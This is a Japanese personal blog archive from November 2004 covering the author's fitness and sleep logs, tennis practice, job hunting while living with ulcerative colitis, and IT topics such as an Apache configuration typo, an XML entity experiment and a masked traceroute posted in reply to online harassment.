« 2004年10月 | トップページ | 2004年12月 »

2004年11月30日 (火曜日)

インターネット電話ソフトskypeのみで仕事が出来るか!?


私が密かにやってみたいと思ってた事を実験してくれる会社があった!

これが上手くいけば、在宅勤務での可能性が広がりますよ!
この技術を応用していけば、難病患者の人とかが働く場を作る事も出来るかもしれないですよ。
この実験の結果には、かなり注目です。

私の場合、skypeを開発の現場で使う事を考えてアイデアを練っていたのですが、 営業でも使えるとは思わなかったですよ。
ネットを使って営業も出来れば、在宅勤務だけで全部出来るじゃない!
思わず妄想が広がります。(笑)

あと、どこかがSoftEtherを使ったSOHOのビジネスモデルの 実験とかをしてくれると嬉しいのだが・・・。(^^;;;;

| | コメント (0) | トラックバック (1)

体力作り日記

Jog 35分
散歩 10分

腹筋 400回

| | コメント (0) | トラックバック (0)

[睡眠時間のログ]コタツで昼寝

2時間

ムチャクチャ眠くなって我慢出来ずに撃沈。(^^;
コタツでぬくぬくは、気持ち良いですなぁ~。(笑)

| | コメント (0) | トラックバック (0)

[睡眠時間のログ]

10時間

| | コメント (0) | トラックバック (0)

2004年11月29日 (月曜日)

体力作り日記

腹筋 300回

| | コメント (0) | トラックバック (0)

47氏本人が書いた「Winnyの技術」という本が

来年(2005年)1月18日に発売予定らしいです。
47氏本人が記す「Winnyの技術」(/.J)
これは買わねば!
(Winnyを使った事が無いのに、技術だけは興味のある人。(^^;>私)

| | コメント (0) | トラックバック (0)

『マイクロソフト、技術情報ページなどからのダウンロードを呼びかけ』との事で、社内SEとかネットワーク管理者はちういかも

Windows XP SP2のWindows Updateで更新プログラムが表示されない不具合(impress.co.jp)

あー、うち、まだSP2当ててないや・・・。(^^;

Windowsでブルースクリーンが表示される不具合の修正パッチを公開」とかあるんで、なかなか移行するタイミングを掴めない・・・。(´・ω・`)

| | コメント (0) | トラックバック (0)

[睡眠時間のログ]

9時間

目が覚めても寒くて布団から出れない罠。(^^;
そのまま布団の中からAirH"PHONEでネット巡回を1時間程したり。
急に起きると眩暈で倒れたりするので、これくらいのんびりな起き方のほうが身体に は優しいらしいけど、えらく贅沢な時間の使い方のような気がする。(笑)

| | コメント (0) | トラックバック (0)

2004年11月28日 (日曜日)

体力作り日記

テニス 2時間弱

サーブとゲーム。

メモ:
  • 重心は(軽く)下にするイメージを持つ。たまに屈伸運動などをすると重心が下にあるイメージを作りやすい。(ヒント:イチローのバッティング理論のインタビュー)
  • サーブの時は、腕に力を入れずに、身体全体で打つ感じ。→腕には70~80%ぐらいの力。それ以上は入れない。
  • やっぱり、ボールに集中するのは重要。ついでに、ラケットのスイートスポットの位置も意識しておくと良さげ。
    調子が良くて集中力が高い時は、ゆっくりとボールの放物線が見えるような感じになる事があるんだけどねぇ。
    最近は、フォームに気を取れれてボールに集中出来てない上に、ボールから目を切るのが早い感じ。
    雑念多し。(^^;
    (川上哲治氏のように「ボールが止まって見える」ような神の領域に入るような集中力が欲しいですなぁ。(笑))

腹筋 300回

| | コメント (0) | トラックバック (0)

[睡眠時間のログ]

8時間30分

| | コメント (0) | トラックバック (0)

体力作り日記・今日は走りに行けなかった。(T_T)

腹筋 100回

今日は、サイトのメンテとか色々としてたら、走りに行く時間が無くなった・・・。_| ̄|○

なんか、うちのサイト、まだ某巨大掲示板で色々と言われてるみたいなので、 今後の事を考えてトラップを増やしました。
(↑こういう事は黙ってれば良いのに、表に出しちゃうから色々と言われるんだよね。(^^;)

うちのこのサイト、どんどん使い勝手が悪くなっていく・・・。(つД`)
普通に見てる人、ゴメンナサイ。m(_ _)m

今日は、無駄な事に凄く時間を使って、とても悲しい日でした・・・。(´・ω・`)ショボーン

| | コメント (0) | トラックバック (0)

2004年11月27日 (土曜日)

残酷物語は、ゲーム開発者だけの事じゃない!

ゲーム開発者残酷物語――EA提訴で明るみに出た業界の実情 (itmedia)

泣ける・・・。(ノД`)シクシク
私も似たような事を経験をしてるので・・・。

情報元:
■ [com]プログラマーの労働時間

| | コメント (0) | トラックバック (0)

[睡眠時間のログ]

9時間

| | コメント (0) | トラックバック (0)

2004年11月26日 (金曜日)

体力作り日記

テニススクール 85分

最近、集中力が無くてイカン。
集中力が足りないから、芯を外れたボールが多くなるんだよ!
打つ瞬間はボールに集中!

腹筋 300回

| | コメント (0) | トラックバック (0)

パンク

自転車で出かけたらタイヤがパンクした。(T_T)
歩いて帰らないといけない。
λ...トボトボ。

つう事で、
散歩 30分
てな感じ。

| | コメント (0) | トラックバック (0)

[睡眠時間のログ]自立訓練法が上手くなった♪

10時間

最近、自律訓練法が少し上手くなってきて、良く眠れるようになってきました。
おかげで、体調が良いですよ。(^_^)

ある方法に気づいてから、第1公式の「手足が重たい」感じを作るのが上手くなりました。
おかげで、楽に自立訓練法に入れるようになったですよ。(^_^)

でも、どちらかと言うと、工学部卒の人 or ロボットアニメオタ向きの方法ですけどね。(^^;
万人向けの方法ではないので注意です。

で、その方法ですが、私の場合、
腕の駆動系回路電源OFF!
みたいな感じで、命令を送ってやるイメージをすると、すごく上手く力が抜けてくれます。
(この後、頭の中で、「電源回路切断しました」と復唱するのも効果的。(笑))
電源OFFにした後は、重力にまかせて置いてるだけなので、 手足の重さを自然に感じる事が出来ます。

第2公式の手足の温感については、最近は、カイロを使って、実際に手を暖めてみて、 暖かい感じのイメージを作ってから自立訓練法をするようにしてます。
カイロに手を当てたままやっても良い感じです。
(イメージして暖かいんじゃなくて、実際に暖めてるのは邪道?(笑))

| | コメント (2) | トラックバック (0)

2004年11月25日 (木曜日)

あうぅぅ~。_| ̄|○

慌てて書いて応募したら、書類の内容に誤りがあった・・・。

急いで直して、また送ったけど、これって印象悪いよね・・・。(ノД`)シクシク

| | コメント (0) | トラックバック (0)

大急ぎで応募

また掲載終了になると悲しいので、 ecareerに登録してあった履歴書を大急ぎで修正して、応募しました。
またしっかりと潰瘍性大腸炎の事を書きましたので、面接まで辿り着かずに落とされる可能性がありますけど・・・。(^^;

何もしないよりは良いって事で、取り合えず応募です。
(経済的にも真面目に就職を考えないとヤバイ段階に来てますしね。(-_-;)

某C社と同じで、客先常駐タイプの仕事なので、以前の私なら、絶対に応募しない求人なんですけどね・・・。
しかし、色々と見た感じ、福利厚生に力を入れてる会社のようなので、そこが応募のポイントになりました。
私のような人は、福利厚生重視でないとね。(^^;

県内で、IT関連の仕事をしようと思ったら、色々と妥協しないといけないですねぇ。
田舎はこれだから・・・。(´・ω・`)ショボーン
ま、しょうがないっす。
仕事があるだけマシです。(まだ就職出来るか分からないけど・・・。)

客先常駐は、某C社で経験済みなので、どうにか対応出来るでしょう。
過去の経験が活かせるのは、ある意味ラッキーなのかもしれないです。(苦笑)
(某C社の経験が無かったら、怖くて応募出来なかったと思ふ・・・。(^^;)

| | コメント (0) | トラックバック (0)

本日買った本

古本屋でお買い物。
この買い物で、ポイントカードがいっぱいになったので、ちょっと嬉しかったり。(^_^)

テニスの王子様 25 そして不二は微笑む(ジャンプ・コミックス)
許斐剛著

出版社 集英社
発売日 2004.09.03
価格  ¥ 410(¥ 390)
ISBN  408873646X

bk1で詳しく見る オンライン書店bk1

機動戦士ガンダムTHE ORIGIN 1~6巻まとめ買い。(^^;;;
機動戦士ガンダムTHE ORIGIN 6 ランバ・ラル編(角川コミックス・エース)
安彦良和著・矢立肇原案・富野由悠季原案

出版社 角川書店
発売日 2004.03
価格  ¥ 609(¥ 580)
ISBN  4047136115

bk1で詳しく見る オンライン書店bk1

| | コメント (0) | トラックバック (0)

体力作り日記

Jog 20分

腹筋 300回

| | コメント (0) | トラックバック (0)

良いかなぁと思ってた会社だったのに、

色々と調べてるうちに募集終了・・・。_| ̄|○
良いの見つけたら、さっさと応募しておくべきなのか・・・。

リクナビNEXTから消えただけなので、 一応、他の転職サイトも見て回って、 同じ会社が募集してないか調べてみようと思いますが・・・。

で、調べたら、ecareerでまだ募集中らしい。
あぁ、でも、勤務地:千葉は、プログラマーは募集してませんか・・・。

プログラマーは体力的にシンドイし、ネットワークエンジニアでも良いかなぁ~、応募しようかなぁ~。

でも、また、
俺にプログラムを組ませろーっ!
になるような気もするしなぁ・・・。(;´Д`)
(私がサーバ管理の実績しか無い偽ネットワーク屋というのもあるし、応募するにはちと問題あるかも・・・。(^^;
でも、勤務地に千葉があるのは魅力だよなぁ~。
千葉でこれだけの条件の会社は滅多に無いからなぁ・・・。)

| | コメント (0) | トラックバック (0)

[睡眠時間のログ]

10時間

| | コメント (0) | トラックバック (0)

こちらで回答します。

あちらに書くと相手を刺激するので、こちらで回答します。

http://life6.2ch.net/test/read.cgi/body/1094117085/481
481 :鳥 ◆CoFD27ghhs :04/11/24 23:30:27 ID:5ov4KI0N
あぁ、それ僕のだ。
いや、昨日ちょっと465の発言が気になってサイトが荒らされてるのかと
思って見に行っただけだよ。
どこが荒らされてるんだろうと全部見たけどどこも荒れてなかった、荒れ
てるってのはこのスレのことだったわけね。

ここしばらく叩かれなかったのでここに出てくる気もなかったんだけど、
僕が荒らしてると思われるのも後々嫌なので一応業務連絡。
頼みたいこともあるしね。

誤爆ではないですよ。
ちゃんとアクセス元の地域を見てますからね。

でも、おかげで、鳥さんのアクセスがどれか分かるようになったのは助かりました。
これで、今後のログ読み作業が楽になります。(^_^)
御連絡ありがとうございました。m(_ _)m

で、荒らしさんですが、私に気を取られてるみたいですから、このままにしておきましょうよ。
わざわざ出て行って、鳥さんまで犠牲になる必要はないですよ。

まぁ、私もそんなに暇じゃないし、滅多に書き込んでなかったんですけどねぇ~。
(久しぶりに書き込みましたよ。(^^;;;;;)
勝手に自爆してるご様子なので、生暖かく見守っておきましょう。(笑)

>頼みたいこともあるしね。

何でしょうか?
私に出来る事ならやりますよ。
鳥さんの頼みなら、簡単に断れないですよ。(^^;
気楽に御連絡下さいです。



どちら方面の人だったのかのヒントとして、tracerouteした結果を貼っておきます。
これを見れば、鳥さんのIPと間違った訳ではないと分かってもらえると思いますが・・・。

アクセス元IPその物を晒すと可哀想なので、それは晒さないけど・・・。
あ、でも、まだ解析不足なので、誤爆の可能性はアリです。(爆)

誤爆だったら、ごめんなさいです。
その時は、容赦無く抗議の連絡を下さい。
宜しくお願いします。m(_ _)m>ここを見てる人

D:\>tracert *.*.ne.jp

Tracing route to *.*.ne.jp [*.*.*.*]
over a maximum of 30 hops:

  1     2 ms     1 ms     1 ms  gw.psv.servehttp.com [*.*.*.*]
  2    56 ms    30 ms    27 ms  203-165-136-1.rev.home.ne.jp [203.165.136.1]
  3    60 ms    30 ms    27 ms  r2-g3-0.ksrzu1.kt.home.ne.jp [203.165.8.222]
  4    51 ms    30 ms    27 ms  bb2-pos2-0.kasiw1.kn.home.ne.jp [61.26.74.101]
  5    59 ms    27 ms    26 ms  c4-pos2-0.kdd1.nap.jp.home.com [203.165.0.205]
  6    29 ms    28 ms    29 ms  gr-16.otemachi.mex.ad.jp [210.155.138.237]
  7    73 ms    33 ms    32 ms  gr-43.ikebukuro.mex.ad.jp [210.155.139.220]
  8    56 ms    29 ms    34 ms  gr-11.otemachi.mex.ad.jp [210.155.129.246]
  9    31 ms    28 ms    28 ms  210.143.147.155
 10    55 ms    31 ms    28 ms  210.143.147.154
 11    35 ms    34 ms    32 ms  210.143.147.91
 12    74 ms    46 ms    48 ms  fukuoka.ntt-poi.FreeBit.NET [210.143.145.46]
 13    71 ms    46 ms    47 ms  fukuoka-3.ntt-poi.FreeBit.NET [219.99.83.213]
 14     *        *        *     Request timed out.
 15     *        *        *     Request timed out.
 16  ^C
D:\>

| | コメント (0) | トラックバック (0)

2004年11月24日 (水曜日)

体力作り日記

Jog 35分
散歩 15分

腹筋 300回

| | コメント (0) | トラックバック (0)

「ほげほげ」の意味

foo (別名:hoge)
(通信用語の基礎知識より)

専門的にコンピュータを扱ってる人が、好んで使いますね。>hogehoge

私も作り捨てのプログラム等で、変数名を考えるが面倒な時などは、hoge1, hoge2とかを使う事があります。
他には、ドキュメント作成の際に、何かしら仮想の名前を付けないといけない場合には、hogehogeと付けたりします。

この事も知らずに某所で無意味に 「ほげほげ」と書き込んでる人に対しては、大変哀れみを感じますなぁ・・・。
私だけがよく使う特別な言葉だと思ってたのでしょうかね?

もう見てる方が恥ずかしいというか、見てらんないです・・・。>某所の書き込み
あまり恥ずかし過ぎるので、ちょっと解説を書いてみましたけど、理解したかな?

書いてる本人は、こんな事は気にしてないんでしょうけどね・・・。
書いてて、楽しくてしょうがないんだろうなぁ~。
哀れだなぁ~。

まぁ、「ほげほげ==私」と思ってるという事は、かなり前から私の事を見てる人だと思われますね。
しかも、私の書いた事を非常によく読んでる感じですよ。
某所で、 深く考えずに「ほげほげ」と書いてしまった人物は、 私に凄いヒントを与えてる事を分かってないのでしょうねぇ~。
本当に哀れ過ぎる・・・。

続きを読む "「ほげほげ」の意味"

| | コメント (0) | トラックバック (0)

[睡眠時間のログ]

10時間

| | コメント (0) | トラックバック (0)

2004年11月23日 (火曜日)

XMLで感情表現を定義するテストをしてみました。

を見て、
を!それ面白そう!
と思ったので、 私の方では、XMLのDTD (Document Type Definition)を使って、 &laugh;を定義してみる実験をしてみました。

実験結果は、こちら(laugh.xm)です。

やってる事は、DTDで、実体宣言(ENTITY)として、laughに":-)"を割り当ててるだけです。
  <!ENTITY laugh ":-)">
こんな風に定義しておくと、&laugh;と書くと":-)"を表示されるようになります。 ( ̄ー ̄)ニヤリ

laugh.xmlのソースは、こんな↓感じ。
<?xml version="1.0" encoding="shift_jis" ?>
<!-- DOCTYPE text SYSTEM "expression.dtd" -->
<!-- ↑IE6はOKだけど、Firefox1.0ではダメぽ -->
<!DOCTYPE text [
<!ENTITY laugh ":-)">
]>
<?xml-stylesheet type="text/xsl" href="laugh.xsl"?>
<text>
&laugh; ENTITY定義を使って笑ってみるテスト &laugh;
</text>

あと、こんな風なXSLファイルを用意してXSLTの機能を使う事でHTMLに変換して表示してます。

&laugh;みたいな感じに、Web感情表現を定義していくアイデアは面白いですね。
XMLベースでWebサイトが構築されるのが一般的になったら、喜んで使う人が居るかも。
今のうちに感情表現のDTDファイルを作ってばら撒けば、デフェクト取れるかも?(笑)
(もう誰かやってますかね?)

参考にしたページ:
サンプルで覚えるXSLTプログラミング(@IT)

2004.11.26追記
2004-11-25 HumanML(neetの日記)

| | コメント (0) | トラックバック (0)

体力作り日記

テニス 60分

ひたすらサーブの練習。 サーブも人差し指の感覚が大切みたい。

で、フォアハンドの時は人差し指、
バックハンドの時は親指の感覚が重要。

腹筋 100回

| | コメント (0) | トラックバック (0)

[睡眠時間のログ]

9時間

| | コメント (0) | トラックバック (0)

2004年11月22日 (月曜日)

体力作り日記

Jog 27分
散歩 16分

途中で夕飯のおかずを買いにスーパーに寄った。

腹筋 200回

| | コメント (0) | トラックバック (0)

本日のお買い物

図解工学・技術の公式
H.Netz編・A.Paul編・矢部寛監修・辻伸浩訳

出版社 技術評論社
発売日 2000.10
価格  ¥ 3,444(¥ 3,280)
ISBN  4774110353
材料力学等の力学から電気磁気、熱、光、機械部品の公式までを網羅した公式集。SI単位を使用、理解を深めるために豊富な図表・設計参考値や例題を掲載。工学系初学者の副読本、また実務者の随時参照に。〈ソフトカバー〉 [bk1の内容紹介]

bk1で詳しく見る オンライン書店bk1

手元に置いておくと便利そうな本だったので、お買い上げ。
パラパラめくって眺めてると結構面白い。

学生時代に目にした事のある公式が沢山載ってますが、 ほとんど覚えてないのは、いつもの事なので気にしない。(;´Д`)

| | コメント (0) | トラックバック (0)

[睡眠時間のログ]

9時間

| | コメント (0) | トラックバック (0)

2004年11月21日 (日曜日)

自宅WebサーバのApacheが落ちてた・・・。_| ̄|○

先日、ちょっと設定を弄った時にミスってた模様・・・。(つД`)

[Wed Nov 17 01:07:30 2004] [notice] Apache configured -- resuming normal operations
[Sun Nov 21 04:02:02 2004] [notice] SIGHUP received. Attempting to restart
Syntax error on line 290 of /秘密のディレクトリ名/apache/conf/httpd.conf:
Invalid command ':#', perhaps mis-spelled or defined by a module not included in the server configuration

Σ(゚д゚lll)ガーン

多少設定をミスってても、
$ apachectl graceful
では通ってしまい運良く動いてしまうらしい・・・。
で、ログローテーションの時にHUPシグナルを貰って、再度、設定を読みに行くときに失敗するので、 忘れた頃に落ちる罠。(´・ω・`)ショボーン

vi使って編集してると、たまに操作ミスで、予想外の所に「:」が入ってたりするんだよね。
viエディタを使った事が無い人には分からないネタですが。(笑)
最近、Emacs系とvi系の両方を使ってるから、たまに指がこんがらがる。(^^;;;;;;;;

で、直したのは、たった一文字。(^^;

[hoge@SCPH-30000 conf]$ diff httpd.conf.bak20041121_1 httpd.conf
290c290
< :# You will have to access it by its address anyway, and this will make
---
> # You will have to access it by its address anyway, and this will make
[hoge@SCPH-30000 conf]$

こんなミスで、Apacheが落ちたのは、初めてですな・・・。(ノД`)シクシク
(他の人がやってるのは見た事あるけどね・・・。(^^;
その時の経験のおかげで、今回は、原因をすぐに見つける事が出来ましたけど、 知らなかったら、もっと手間取ってたかも。(^^;;;;;;;;;;;
と言う事で、貴重な失敗例を見せてくれた人に感謝ですね。
恩返しの意味も込めて、私のミスの事例もポイントをまとめて公開。)

現在、注意力散漫ちう。>私

で、取り敢えず、設定し直して、再起動しました。

[Sun Nov 21 16:05:49 2004] [warn] pid file /秘密のディレクトリ/apache/logs/httpd.pid overwritten -- Unclean shutdown of previous Apache run?
[Sun Nov 21 16:05:49 2004] [notice] Apache configured -- resuming normal operations

という事で、現在は、こちらの掲示板も使えるようになってます。

| | コメント (0) | トラックバック (0)

体力作り日記

テニススクール 90分

片手打ちのバックハンドで、短いボールのアプローチをする時はスライスを使う。
(コーチから「アプローチの時は、スライスを使って良いよ」とのお言葉。ついにスライス解禁か?)
スライスの時は、気持ち体を開く方が打ちやすい。 (フラットとスライスのどちらで打つか判断を早くする必要あり)

短い球を処理する時ほどグリップエンドの動きをしっかりと意識する事。(フォアの時もバックの時も)

サーブの時は、イースタングリップにして、手首に無理のかからない打ち方にする。
イースタングリップなので、ボールを捕らえる時の面向きに注意すること。

サーブの時に狙うのは、テニスコート上サービスエリアのポイントを意識するより、 ネットの上のどの辺りを通過させるかを意識した方が良いみたい。

腹筋 200回

| | コメント (0) | トラックバック (0)

[睡眠時間のログ]今日は、早起きです。

6時間

早起きしてテニススクールへ。

| | コメント (0) | トラックバック (0)

2004年11月20日 (土曜日)

体力作り日記

腹筋 300回

| | コメント (0) | トラックバック (0)

例の順天堂の潰瘍性大腸炎治験の詳細情報出たようです。

某スレから情報ゲット。
asahi.com : 健康 : 暮らしと健康コラム

この記事の雰囲気だと、本物っぽい治療法ですね。
(この新療法の存在は知ってましたが、本当かなぁ?とちょっと疑っておりました。(^^;)

 「新療法は、抗原であるバリウム菌をやっつける、いわば根治的な治療法です。しかも、治療費は3種類の抗生物質2週間分の薬価3000円しかかからないため、今後の普及が大いに期待できます」(大草氏)

本当に根治するなら、素晴しい成果ですよ。
ついに、UC治療もここまできたんだなぁ~。(つД`)
手術しないで頑張ってきた方々、
おめでとう!


全国の病院でこの治療を早く受けれるようになると良いですね。

社会復帰を焦って、手術したのは、失敗だったか・・・?>私
(その上、社会復帰に失敗してる罠。ギャハハハ(≧▽≦))

本当に私を悔しがらせるぐらいの効果のある治療法である事に期待してます。
そういう意味で、新療法を受けた方々の結果報告に興味津々です。

| | コメント (0) | トラックバック (0)

IT業界のデスマーチの原因の一つは、日本人だから?

続・なぜ「IT産業のトヨタ」は出ないのか(ITPro)
気になった部分を下にメモとして引用してみました。

「日本企業はインテグラル型のもの造りに強い」と述べています。インテグラル型の製品とは,独自に部品を設計し,しかも各部品の設計を調整して全体を生産しなければならないものだそうです。こうした調整作業を藤本教授は「擦り合わせ」と呼んでいます。

日本の“要件変更無限地獄”

品質は圧倒的に日本が上です。
(snip)
日本は過剰品質なのかもしれませんが,国民性ですから品質は落とせないでしょう。

90-90の法則があります。90%を達成しても残りの10%をクリアするために,90%のコストと時間がかかると言います。
パレートの法則とも関係しそうですね。

日本人は標準化とか規約ルールをともすれば守らないので,だれでもメンテナンスできるようにはなかなかもっていけません。

インテグラルな現場調整力があるからこそ,設計が欧米に比べ曖昧でもかまわないのかもしれません。製造業でも設計と製造とのコンカレント化は日本のお家芸です。

宮大工SEに活躍の場を

天才プログラマが楽しく仕事をできるIT業界になってほしいと思います。

うーん、考えさせられる事が沢山書かれてる記事だなぁ~。

“要件変更無限地獄”は、日本人ゆえにだからなのか・・・。(´・ω・`)

日本人的な開発が嫌なら、外資に行け!となるんですかね?
日本人の強みを生かしつつデスマーチにならない良い開発手法を考え出せないですかね?

それから、この記事を読んだ感じでは、ソフトの品質勝負になれば、 日本人でも勝てるとの事なので、そこを売りに世界に売り込んでいくってのも必要かも。
独創性勝負だと、日本人は勝てないっぽい。(´・ω・`)ショボーン

しかし、今の日本のプログラム開発の現場って、 品質が良いコードより、開発期間の短さの方を優先しちゃってるところがあるので、 品質の大切さをおざなりにする方向に進んでる感じ・・・。
プログラマーの多くは、
「とにかく、早く作れ!早く完成させろ!」
と追い立てまくられる日々を送ってますから、品質の事まで考える余裕なんて無いですよね・・・。(つД`)
論理的な方法論で品質を維持する余裕なんて無しな現場が多いでしょう・・・。
私なんかは、プログラマーの本能のみを頼りに、品質を維持してたという感じでしたから・・・。(^^;
(プログラムを組んでると、ココはヤバイとか分かるので、ヤバそうな所は、それなりに慎重に作業します。
本能センサーから外れたそれ以外の部分についての品質は、神のみぞ知る状態。(爆)
自分の作ったプログラムを第三者にレビューしてチェックしてもらった事も無いし・・・。
そんな感じで作ったプログラムを胸を張って、人様にお渡し出来るハズもない・・・。(ノД`)
こうして、常にストレスを抱えた自信の無いプログラマーが量産される事になります・・・。(-_-; )

このままだと、日本人の強みの部分も失われて、何も残らない危険性があるかもと不安になったりしますな・・・。
(某みずほの件とかで、品質を軽視して、すでに散々痛い目に合ってるわけですが・・・。>IT業界)

| | コメント (0) | トラックバック (0)

NIFTY SERVEのフォーラム、2005年3月をめどにWebフォーラムに移行

http://internet.watch.impress.co.jp/cda/news/2004/11/17/5450.html
http://slashdot.jp/articles/04/11/18/2121255.shtml?topic=105


自分のPATIOを作ったりして、 パソ通時代のNIFTY SERVEには、随分とお世話になりました。m(_ _)m

私は、
アマチュア無線のパケット通信→パソ通→Web
と流れていきましたが、次は何でしょうかねぇ~。

あ~、次は、IPv6が待ってるな~。
新しい技術が生まれると、ネット環境は、ドンドン変わっていきますからね。
時代の流れには逆らえない罠。

ちょっと寂しいけどね。

| | コメント (0) | トラックバック (0)

[睡眠時間のログ]

9時間

| | コメント (0) | トラックバック (0)

livedoor パブリック・ジャーナリスト募集

livedoor ニュース:パブリック・ジャーナリスト募集
あなたも記者になって、ニュースやオピニオンを書いてみませんか?


特定疾患IBD関連のネタを書いてみたいような気がする。
それから、IT業界のデジタルドカタの悲惨さの取材とか。(爆)

一人でやってるとネタ切れするので、チームを組んでやってみると面白そうですね。
誰かやらんかい?(道連れ募集!(^^;)

特定疾患やIBD関連の事については、言いたい事を沢山抱えてる人が多そうですからね。
それを一般の人の目に触れる所に出せると、新しい流れを作れるかも。
(ライブドアのこの企画がどれくらい一般の人に注目される物なのかまだ分かりませんが・・・。)

IBD関連だと、CCJAPANがあるんだけど、 一般人に向けての情報発信じゃないからね。
こういう病気もあるんだよって事を一般の人にも知ってもらわないと、 我々のような 内部障害者は 一生理解されないまま生き続けなければならないでしょう。(つД`)

という事で、何かしら情報発信出来る機会があれば良いなぁと、 ずっと思ってましたので、これは利用したいかもしれない・・・。
実際に、ライブドアがどのような運用を考えてるのか分かりませんので、 これを利用する事で、どれ程の効果があるのか分かりませんが、やらないよりマシでしょって感じがします。
今までは、このようなチャンスすらあまり無かったわけですからね。
Webという新しい媒体を使って、このような事に挑戦するライブドアは、応援したいですね。
(blogで独自に情報発信するという方法もあるのですが、 やはりちゃんとしたニュースサイトで取り上げてもらった方が、効果が大きいと思うし・・・。)

8,000円の研修費は痛いけど、ちょっと登録してみようかな。
(NEET状態の私には、はっせんえんは、超大金。(笑))

あ、就職活動では、ライブドア様から瞬殺不採用通知を頂きましたが、別に嫌ってはないですよ。
瞬殺という面白いネタを頂いたので、逆に超感謝です。(笑)
(とか言う事を書いて、ホリエモンのblogにトラックバックする超チャレンジャーな私。(爆))

関連記事:

追記(2004.11.20 13:30):
livedoorユーザIDを取ってみた。

| | コメント (0) | トラックバック (0)

2004年11月19日 (金曜日)

体力作り日記

テニススクール 85分

サーブのトスはベースラインより前に落ちる位置に上げる。
今までのは体に近過ぎ。

腹筋 200回

| | コメント (0) | トラックバック (0)

私のプログラム歴は22年(爆)

ネタ切れ気味なので、大学時代の友人から頂いたメールからネタを拝借。(^^;

今更ですが、プログラム歴、私よりずっと長いっすね。
そういえばベーマガにも○ちゃん(←PSV)の投稿作品が載っていたのを ○○さんから見せてもらって驚いた記憶があります。

長さだけは、長いですな。(笑)>私のプログラミング歴
当時は、マイコン(現在で言うパソコン)を買ったらプログラムを組むのが当たり前でしたので、 私の場合、
コンピュータ歴==プログラム歴
です。

コンピュータ関連の事を考えたり妄想したりするのは、完全に生活の中に組み込まれてまして、 22年間、コンピュータの事が頭の中から消えた事はないです。(爆)

ある意味、私も呪われたプログラマですな・・・。(^^;
(呪われてるけど、やねうらおさんみたいなスキルは持ってないので、単に呪われてるだけですが。(´・ω・`))

あ、この「呪われたプログラマ」って言葉は、ネットで流行らせたいですな。(爆)

閑話休題

プログラム歴は長いのですが、いまいち自信を持って、 プログラミングが得意と言い切れないところがあるんですよねぇ~。>私

多分、マイナー志向で、 X68KとかMacとかあまり仕事では使わない方面への寄り道ばかりをしてた時間が長かったせいでしょう。
メジャーなものにはほとんど対応出来ないという職業プログラマーとしては、致命的な欠点があります。

職業プログラマーになってから、仕事で必要な物だけに集中してガーッ!と勉強した人の方が、 仕事をする上では、私より何倍も有能ですよ。
私の持ってるのは、会社では、ゴミ扱いされる知識ばかり・・・。
(´・ω・`)ショボーン

実際に私がコンピュータを扱ってる時は、そのゴミ知識もフル動員して、 作業してるので役には立ってるのですが、外からは、そのゴミ知識の効果が分からないですからねぇ~。
アイツ、何考えてるのか分からない!という事になるんで・・・。(つД`)
それに、他の知識を経由して考えてるので、最短コースの思考方法ではないんですよ。
ですから、激しく効率が悪くて、仕事が遅い。
仕事が遅い癖に、余計な事まで考えてるから、本人は凄く疲れる・・・。_| ̄|○

仕事で必要な知識だけを持ってる人の方が、最適化されてるので、圧倒的に効率が良いですし、 仕事が早いです。
そちらの方が、会社としては、扱いやすいし、便利ですよ。
ですので、仕事をする上では、そのような人の方が、優秀だと扱われますね。

私のように余計な事まで考えてる人は、予想外の事態に対応出来る場合が稀にありますが、 そんな事まで考えておく必要のある事態は滅多に無く、普段は重宝されません・・・。
普段は、余計な事を指摘したりして、ウザがられるのが関の山。(^^;
(実際、ウザがられた経験はありますが・・・。(爆))

という事で、せっかく勉強してるのに、力を入れる部分を失敗したなぁと・・・。
(それはそれで、楽しかったんですけどね・・・。(笑))

プログラマーとしての価値は、プログラム歴ではなく、 どれだけ市場のニーズに合ったスキルを持ってるかという事でしょうね。
という事で、私のプログラミング歴なんてのは、ハッタリにしか使えないです。
それに、業務経験以外のプログラム歴は、就職活動ではカウントされませんので、 まったくの無駄です。(T_T)
そんな感じで、今までの人生何だったんだ!?状態の私。(^^;

今の私が、1980年台のコンピュータ業界に戻れたら、スーパープログラマーなんでしょうけど。(笑)
現在のWindowsやJavaの時代には、典型的なダメプログラマーですな。(´・ω・`)ショボーン

と言うか、、、今は無職で、プログラマーでもないわけで・・・。
_| ̄|○_| ̄|○_| ̄|○

私の時代は、もう来ないのでしょうか?(爆)

なんか、俺、疲れたCOBOLオヤヂみたいな事言ってるな・・・。(苦笑)
(そんな事言わずに、今の時代に合わせたスキルを身に付けろよ!>俺)

| | コメント (0) | トラックバック (0)

[睡眠時間のログ]

9時間

| | コメント (0) | トラックバック (0)

対応はやっ!>ライブドア

さっき応募したのに、 もう返事が来ました。 Σ(゚д゚lll)ガーン
こんな時間にまだ働いてるですか!

で、結果は、
この度は、弊社求人にご応募頂きまして、誠にありがとうございました。

ご応募について、社内の関連部門とともに検討させていただきましたが、
今回は残念ながらご期待に添えない結果となりました。
あしからずご了承くださいますようお願いいたします。
末筆ながら、貴殿の今後のご活躍とご健康をお祈り申し上げます。

どうぞよろしくお願い致します。
との事でした。(´・ω・`)ショボーン

勘違いされないように、UCの事を目立つように書いておいたからね。(^^;
UCが難病指定されてる事もしっかり書いておいたので、そこはちゃんと見てくれたのでしょう。(笑)
以前やった就職活動では、履歴書には病名しか書いてなくて、面接の時に詳しく説明したら、 そこでビビられて不採用に・・・という事が何度もあったので、 今回は最初からしっかりと書いておいてみました。
ですので、それを見て、ビビッて脊髄反射の即レスだったのでせう。
そうでないと、この返事の早さはありえない。(;´Д`)

検討したという回答をいただいてるけど、そんなに検討してないハズ。(笑)
罠として、自宅サーバの某URLを書いておいたのですが、アクセスしてくれてないもの。(つД`)

ライブドアぐらいの大きさの会社になると、もう難病患者を雇うのは、躊躇するのかぁ~。
ベンチャー魂のある会社だから、いけるかな?と思ったんだけど・・・。(´・ω・`)ショボーン
ネクタイしてないとか、上司とタメ口で話すとか、髪の毛の色が凄い事になってるとかは個性扱い出来ても 病気を持ってる事を個性として扱うのは難しいですか、そうですか・・・。

やっぱり、社員数が数名とかの小さい会社じゃないと相手にされないのかなぁ~?
ホントに人手が足りない所は、病気とかには目をつぶって雇ってくれる可能性があるからね・・・。

技術的には、そんなに遜色ないと思うんだけど・・・。>私
病気持ちは、技術があっても市場価値無しかなぁ~???(T_T)
(まぁ、IT業界は、デスマーチがディフォルトの所が多いので、 病気持ちで体力が無くて、徹夜仕事の難しい人を雇いたくないのは理解出来ますが・・・。)

